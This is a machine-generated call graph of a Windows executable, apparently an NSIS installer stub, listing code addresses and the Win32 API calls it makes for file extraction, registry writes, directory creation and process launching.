4881 40145c 18 API calls 4879->4881 4882 401fb3 4880->4882 4883 40145c 18 API calls 4880->4883 4881->4880 4884 402006 4882->4884 4885 401fbc 4882->4885 4883->4882 4887 40145c 18 API calls 4884->4887 4886 401446 18 API calls 4885->4886 4889 401fc4 4886->4889 4888 40200d 4887->4888 4890 40145c 18 API calls 4888->4890 4891 401446 18 API calls 4889->4891 4892 402016 FindWindowExW 4890->4892 4893 401fce 4891->4893 4897 402036 4892->4897 4894 401ff6 SendMessageW 4893->4894 4895 401fd8 SendMessageTimeoutW 4893->4895 4894->4897 4895->4897 4896 4030e3 4897->4896 4899 405f51 wsprintfW 4897->4899 4899->4896 4900 402880 4901 402884 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028a7 4902->4903 4904 40145c 18 API calls 4903->4904 4905 4028b1 4904->4905 4906 4028ba RegCreateKeyExW 4905->4906 4907 4028e8 4906->4907 4914 4029ef 4906->4914 4908 402934 4907->4908 4909 40145c 18 API calls 4907->4909 4910 402963 4908->4910 4913 401446 18 API calls 4908->4913 4912 4028fc lstrlenW 4909->4912 4911 4029ae RegSetValueExW 4910->4911 4915 40337f 37 API calls 4910->4915 4918 4029c6 RegCloseKey 4911->4918 4919 4029cb 4911->4919 4916 402918 4912->4916 4917 40292a 4912->4917 4920 402947 4913->4920 4921 40297b 4915->4921 4922 4062a3 11 API calls 4916->4922 4923 4062a3 11 API calls 4917->4923 4918->4914 4924 4062a3 11 API calls 4919->4924 4925 4062a3 11 API calls 4920->4925 4931 406224 4921->4931 4927 402922 4922->4927 4923->4908 4924->4918 4925->4910 4927->4911 4930 4062a3 11 API calls 4930->4927 4932 406247 4931->4932 4933 40628a 4932->4933 4934 40625c wsprintfW 4932->4934 4935 402991 4933->4935 4936 406293 lstrcatW 4933->4936 4934->4933 4934->4934 4935->4930 4936->4935 4937 402082 4938 401446 18 API calls 4937->4938 4939 402093 SetWindowLongW 4938->4939 4940 4030e3 4939->4940 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3966 403c83 3640->3966 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4023 406009 lstrcpynW 3651->4023 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4024 405e50 GetFileAttributesW CreateFileW 3674->4024 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4027 406009 lstrcpynW 3684->4027 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4025 405f51 wsprintfW 3696->4025 4026 406009 lstrcpynW 3696->4026 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4028 406a99 lstrcpyW 3704->4028 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3965 406009 lstrcpynW 3820->3965 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3915 40160c 3834->3915 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3915 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3942 40145c 3842->3942 3859 40145c 18 API calls 3843->3859 3957 401446 3844->3957 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3915 3847->3915 3964 405f51 wsprintfW 3847->3964 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3915 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3915 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3915 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3915 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3915 3879 4062a3 11 API calls 3868->3879 3869->3915 3870->3915 3871->3915 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3960 4062d5 FindFirstFileW 3874->3960 3885 40197f 3875->3885 3928 4019a1 3875->3928 3877 40169a 3887 4062a3 11 API calls 3877->3887 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3910 4062d5 2 API calls 3885->3910 3885->3928 3895 4016a7 3887->3895 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3915 3908 404f72 25 API calls 3892->3908 3904 4016b1 Sleep 3895->3904 3905 4016ae 3895->3905 3896 4019b8 GetShortPathNameW 3896->3915 3906 4018f5 3897->3906 3898->3915 3899->3915 3907 4062a3 11 API calls 3900->3907 3901 4018c2 3911 4062a3 11 API calls 3901->3911 3902 4018a9 3909 4062a3 11 API calls 3902->3909 3904->3915 3905->3904 3913 4062a3 11 API calls 3906->3913 3907->3915 3908->3915 3909->3915 3914 401991 3910->3914 3911->3915 3912 4017d4 3916 401864 3912->3916 3919 405d06 CharNextW 3912->3919 3937 4062a3 11 API calls 3912->3937 3917 401902 MoveFileW 3913->3917 3914->3928 3963 406009 lstrcpynW 3914->3963 3915->3832 3916->3892 3918 40186e 3916->3918 3920 401912 3917->3920 3921 40191e 3917->3921 3922 404f72 25 API calls 3918->3922 3924 4017e6 CreateDirectoryW 3919->3924 3920->3892 3926 401942 3921->3926 3931 4062d5 2 API calls 3921->3931 3927 401875 3922->3927 3924->3912 3925 4017fe GetLastError 3924->3925 3929 401827 GetFileAttributesW 3925->3929 3930 40180b GetLastError 3925->3930 3936 4062a3 11 API calls 3926->3936 3956 406009 lstrcpynW 3927->3956 3928->3896 3928->3915 3929->3912 3933 4062a3 11 API calls 3930->3933 3934 401929 3931->3934 3933->3912 3934->3926 3939 406c68 42 API calls 3934->3939 3935 401882 SetCurrentDirectoryW 3935->3915 3938 40195c 3936->3938 3937->3912 3938->3915 3940 401936 3939->3940 3941 404f72 25 API calls 3940->3941 3941->3926 3943 406805 18 API calls 3942->3943 3944 401488 3943->3944 3945 401497 3944->3945 3946 406038 5 API calls 3944->3946 3947 4062a3 lstrlenW wvsprintfW 3945->3947 3946->3945 3948 4060e7 9 API calls 3947->3948 3949 4017c9 3948->3949 3950 405d59 CharNextW CharNextW 3949->3950 3951 405d76 3950->3951 3952 405d88 3950->3952 3951->3952 3953 405d83 CharNextW 3951->3953 3954 405dac 3952->3954 3955 405d06 CharNextW 3952->3955 3953->3954 3954->3912 3955->3952 3956->3935 3958 406805 18 API calls 3957->3958 3959 401455 3958->3959 3959->3877 3961 4018a5 3960->3961 3962 4062eb FindClose 3960->3962 3961->3901 3961->3902 3962->3961 3963->3928 3964->3915 3965->3822 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 CoUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3653 4024->3677 4025->3696 4026->3696 4027->3685 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3706 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4941 402a84 4942 401553 19 API calls 4941->4942 4943 402a8e 4942->4943 4944 401446 18 API calls 4943->4944 4945 402a98 4944->4945 4946 401a13 4945->4946 4947 402ab2 RegEnumKeyW 4945->4947 4948 402abe RegEnumValueW 4945->4948 4949 402a7e 4947->4949 4948->4946 4948->4949 4949->4946 4950 4029e4 RegCloseKey 4949->4950 4950->4946 4951 402c8a 4952 402ca2 4951->4952 4953 402c8f 4951->4953 4955 40145c 18 API calls 4952->4955 4954 401446 18 API calls 4953->4954 4957 402c97 4954->4957 4956 402ca9 lstrlenW 4955->4956 4956->4957 4958 402ccb WriteFile 4957->4958 4959 401a13 4957->4959 4958->4959 4960 40400d 4961 40406a 4960->4961 4962 40401a lstrcpynA lstrlenA 4960->4962 4962->4961 4963 40404b 4962->4963 4963->4961 4964 404057 GlobalFree 4963->4964 4964->4961 4965 401d8e 4966 40145c 18 API calls 4965->4966 4967 401d95 ExpandEnvironmentStringsW 4966->4967 4968 401da8 4967->4968 4970 401db9 4967->4970 4969 401dad lstrcmpW 4968->4969 4968->4970 4969->4970 4971 401e0f 4972 401446 18 API calls 4971->4972 4973 401e17 4972->4973 4974 401446 18 API calls 4973->4974 4975 401e21 4974->4975 4976 4030e3 4975->4976 4978 405f51 wsprintfW 4975->4978 4978->4976 4979 402392 4980 40145c 18 API calls 4979->4980 4981 402399 4980->4981 4984 4071f8 4981->4984 4985 406ed2 25 API calls 4984->4985 4986 407218 4985->4986 4987 407222 lstrcpynW lstrcmpW 4986->4987 4988 4023a7 4986->4988 4989 407254 4987->4989 4990 40725a lstrcpynW 4987->4990 4989->4990 4990->4988 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4991 402797 4992 40145c 18 API calls 4991->4992 4993 4027ae 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027b7 4994->4995 4996 40145c 18 API calls 4995->4996 4997 4027c0 GetPrivateProfileStringW lstrcmpW 4996->4997 4998 402e18 4999 40145c 18 API calls 4998->4999 5000 402e1f FindFirstFileW 4999->5000 5001 402e32 5000->5001 5006 405f51 wsprintfW 5001->5006 5003 402e43 5007 406009 lstrcpynW 5003->5007 5005 402e50 5006->5003 5007->5005 5008 401e9a 5009 40145c 18 API calls 5008->5009 5010 401ea1 5009->5010 5011 401446 18 API calls 5010->5011 5012 401eab wsprintfW 5011->5012 4288 401a1f 4289 40145c 18 API calls 4288->4289 4290 401a26 4289->4290 4291 4062a3 11 API calls 4290->4291 4292 401a49 4291->4292 4293 401a64 4292->4293 4294 401a5c 4292->4294 4342 406009 lstrcpynW 4293->4342 4341 406009 lstrcpynW 4294->4341 4297 401a62 4301 406038 5 API calls 4297->4301 4298 401a6f 4299 406722 3 API calls 4298->4299 4300 401a75 lstrcatW 4299->4300 4300->4297 4303 401a81 4301->4303 4302 4062d5 2 API calls 4302->4303 4303->4302 4304 405e30 2 API calls 4303->4304 4306 401a98 CompareFileTime 4303->4306 4307 401ba9 4303->4307 4311 4062a3 11 API calls 4303->4311 4315 406009 lstrcpynW 4303->4315 4321 406805 18 API calls 4303->4321 4328 405ca0 MessageBoxIndirectW 4303->4328 4332 401b50 4303->4332 4339 401b5d 4303->4339 4340 405e50 GetFileAttributesW CreateFileW 4303->4340 4304->4303 4306->4303 4308 404f72 25 API calls 4307->4308 4310 401bb3 4308->4310 4309 404f72 25 API calls 4312 401b70 4309->4312 4313 40337f 37 API calls 4310->4313 4311->4303 4316 4062a3 11 API calls 4312->4316 4314 401bc6 4313->4314 4317 4062a3 11 API calls 4314->4317 4315->4303 4323 401b8b 4316->4323 4318 401bda 4317->4318 4319 401be9 SetFileTime 4318->4319 4320 401bf8 CloseHandle 4318->4320 4319->4320 4322 401c09 4320->4322 4320->4323 4321->4303 4324 401c21 4322->4324 4325 401c0e 4322->4325 4327 406805 18 API calls 4324->4327 4326 406805 18 API calls 4325->4326 4329 401c16 lstrcatW 4326->4329 4330 401c29 4327->4330 4328->4303 4329->4330 4331 4062a3 11 API calls 4330->4331 4333 401c34 4331->4333 4334 401b93 4332->4334 4335 401b53 4332->4335 4336 405ca0 MessageBoxIndirectW 4333->4336 4337 4062a3 11 API calls 4334->4337 4338 4062a3 11 API calls 4335->4338 4336->4323 4337->4323 4338->4339 4339->4309 4340->4303 4341->4297 4342->4298 5013 40209f GetDlgItem GetClientRect 5014 40145c 18 API calls 5013->5014 5015 4020cf LoadImageW SendMessageW 5014->5015 5016 4030e3 5015->5016 5017 4020ed DeleteObject 5015->5017 5017->5016 5018 402b9f 5019 401446 18 API calls 5018->5019 5024 402ba7 5019->5024 5020 402c4a 5021 402bdf ReadFile 5023 402c3d 5021->5023 5021->5024 5022 401446 18 API calls 5022->5023 5023->5020 5023->5022 5030 402d17 ReadFile 5023->5030 5024->5020 5024->5021 5024->5023 5025 402c06 MultiByteToWideChar 5024->5025 5026 402c3f 5024->5026 5028 402c4f 5024->5028 5025->5024 5025->5028 5031 405f51 wsprintfW 5026->5031 5028->5023 5029 402c6b SetFilePointer 5028->5029 5029->5023 5030->5023 5031->5020 5032 402b23 GlobalAlloc 5033 402b39 5032->5033 5034 402b4b 5032->5034 5035 401446 18 API calls 5033->5035 5036 40145c 18 API calls 5034->5036 5037 402b41 5035->5037 5038 402b52 WideCharToMultiByte lstrlenA 5036->5038 5039 402b93 5037->5039 5040 402b84 WriteFile 5037->5040 5038->5037 5040->5039 5041 402384 GlobalFree 5040->5041 5041->5039 5043 4044a5 5044 404512 5043->5044 5045 4044df 5043->5045 5047 40451f GetDlgItem GetAsyncKeyState 5044->5047 5054 4045b1 5044->5054 5111 405c84 GetDlgItemTextW 5045->5111 5050 40453e GetDlgItem 5047->5050 5057 40455c 5047->5057 5048 4044ea 5051 406038 5 API calls 5048->5051 5049 40469d 5109 404833 5049->5109 5113 405c84 GetDlgItemTextW 5049->5113 5052 403d3f 19 API calls 5050->5052 5053 4044f0 5051->5053 5056 404551 ShowWindow 5052->5056 5059 403e74 5 API calls 5053->5059 5054->5049 5060 406805 18 API calls 5054->5060 5054->5109 5056->5057 5062 404579 SetWindowTextW 5057->5062 5067 405d59 4 API calls 5057->5067 5058 403dca 8 API calls 5063 404847 5058->5063 5064 4044f5 GetDlgItem 5059->5064 5065 40462f SHBrowseForFolderW 5060->5065 5061 4046c9 5066 40677e 18 API calls 5061->5066 5068 403d3f 19 API calls 5062->5068 5069 404503 IsDlgButtonChecked 5064->5069 5064->5109 5065->5049 5070 404647 CoTaskMemFree 5065->5070 5071 4046cf 5066->5071 5072 40456f 5067->5072 5073 404597 5068->5073 5069->5044 5074 406722 3 API calls 5070->5074 5114 406009 lstrcpynW 5071->5114 5072->5062 5078 406722 3 API calls 5072->5078 5075 403d3f 19 API calls 5073->5075 5076 404654 5074->5076 5079 4045a2 5075->5079 5080 40468b SetDlgItemTextW 5076->5080 5085 406805 18 API calls 5076->5085 5078->5062 5112 403d98 SendMessageW 5079->5112 5080->5049 5081 4046e6 5083 4062fc 3 API calls 5081->5083 5092 4046ee 5083->5092 5084 4045aa 5088 4062fc 3 API calls 5084->5088 5086 404673 lstrcmpiW 5085->5086 5086->5080 5089 404684 lstrcatW 5086->5089 5087 404730 5115 406009 lstrcpynW 5087->5115 5088->5054 5089->5080 5091 404739 5093 405d59 4 API calls 5091->5093 